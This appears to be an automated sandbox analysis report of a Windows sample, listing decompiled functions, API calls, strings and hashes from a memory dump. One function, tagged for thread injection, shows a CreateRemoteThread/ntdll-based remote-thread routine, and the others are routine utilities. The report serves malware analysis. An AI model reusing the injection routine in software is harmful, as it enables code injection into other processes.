Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}

APIs

GetVersionExW.KERNEL32(?,751468A0,00000000), ref: 0040A290
CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F

Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

$, xrefs: 0040A2E3

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
String ID: $
API String ID: 283512611-3993045852
Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}

APIs

_snwprintf.MSVCRT ref: 004016BC

Strings

Line%d, xrefs: 004016AE
Lines, xrefs: 00401696

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: Line%d$Lines
API String ID: 3988819677-2790224864
Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}

APIs

_snwprintf.MSVCRT ref: 00405174
memcpy.MSVCRT ref: 00405184

Strings

%2.2X , xrefs: 00405169

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5

Uniqueness

Uniqueness Score: -1.00%

Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}

0x004075bb
0x004075c2
0x004075c7
0x004075ca
0x004075cd
0x004075d8
0x004075e9
0x004075fc
0x00407600
0x00407601
0x00407606
0x00407609
0x0040760e
0x00407619
0x0040761e
0x0040761f
0x00407624
0x00407636

APIs

_snwprintf.MSVCRT ref: 004075E9
_snwprintf.MSVCRT ref: 00407609

Strings

%%-%d.%ds , xrefs: 004075DE

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: %%-%d.%ds
API String ID: 3988819677-2008345750
Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}

0x00405080
0x00405086
0x0040508b
0x0040508e
0x00405091
0x00405097
0x0040509d
0x004050a4
0x004050ab
0x004050b2
0x004050b5
0x004050bc
0x004050cb
0x004050e0
0x004050cd
0x004050d1
0x004050dc
0x004050dc

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004050C3
wcscpy.MSVCRT ref: 004050D1

Strings

L, xrefs: 004050A4

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameOpenwcscpy
String ID: L
API String ID: 3246554996-2909332022
Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}

0x00409072
0x00409074
0x0040907d
0x00409086
0x0040908e
0x004090a5
0x004090a5
0x0040908e
0x004090ac

APIs

GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086

Strings

LookupAccountSidW, xrefs: 0040907F
Y@, xrefs: 0040906D

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: LookupAccountSidW$Y@
API String ID: 190572456-2352570548
Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040ad8c
0x0040ad93
0x0040ad95
0x0040ad9d
0x0040ada5
0x0040adb2
0x0040adb2
0x0040adb5
0x0040adbf

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

Strings

shlwapi.dll, xrefs: 0040AD87

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Load$AddressFreeProcmemsetwcscat
String ID: shlwapi.dll
API String ID: 4092907564-3792422438
Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669

Uniqueness

Uniqueness Score: -1.00%

Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}

0x00406597
0x00406598
0x004065a0
0x004065aa
0x004065ac
0x004065ac
0x004065bd

APIs

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 004065A0
wcscat.MSVCRT ref: 004065B6

Strings

_lng.ini, xrefs: 004065B0

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}

0x0040ac59
0x0040ac60
0x0040ac68
0x0040ac6d
0x0040ac75
0x0040ac7b
0x00000000
0x0040ac7b
0x0040ac6d
0x0040ac80

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75

Strings

shell32.dll, xrefs: 0040AC5B
SHGetSpecialFolderPathW, xrefs: 0040AC6F

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 946536540-880857682
Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E

Uniqueness

Uniqueness Score: -1.00%

Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}

APIs

Part of subcall function 00404FA4: memset.MSVCRT ref: 00404FB2

??2@YAPAXI@Z.MSVCRT ref: 004066B9
??2@YAPAXI@Z.MSVCRT ref: 004066E0
??2@YAPAXI@Z.MSVCRT ref: 00406701
??2@YAPAXI@Z.MSVCRT ref: 00406722

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18

Uniqueness

Uniqueness Score: -1.00%

Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}

APIs

wcslen.MSVCRT ref: 004054EC
free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F

Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
memcpy.MSVCRT ref: 00405556

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}

APIs

??2@YAPAXI@Z.MSVCRT ref: 00405B19
??2@YAPAXI@Z.MSVCRT ref: 00405B37
??2@YAPAXI@Z.MSVCRT ref: 00405B55
??2@YAPAXI@Z.MSVCRT ref: 00405B73

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 6560 Parent PID: 6444 svchost.exeCOMMON

Executed Functions

Function 0566E4A8, Relevance: 1.7, APIs: 1, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

